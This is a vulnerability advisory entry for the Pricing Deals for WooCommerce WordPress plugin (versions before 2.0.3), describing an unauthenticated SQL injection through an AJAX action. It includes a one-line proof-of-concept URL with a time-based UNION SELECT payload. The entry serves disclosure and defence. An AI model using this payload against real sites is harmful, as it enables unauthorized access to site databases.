WordPress Plugin Vulnerabilities
Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection
Proof of Concept
https://examle.com/wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%'+union+select+1,sleep(5),3%23'
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
wuzhenyu
Submitter
king
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-06-16 (about 1 years ago)
Added
2022-06-16 (about 1 years ago)
Last Updated
2023-03-21 (about 1 years ago)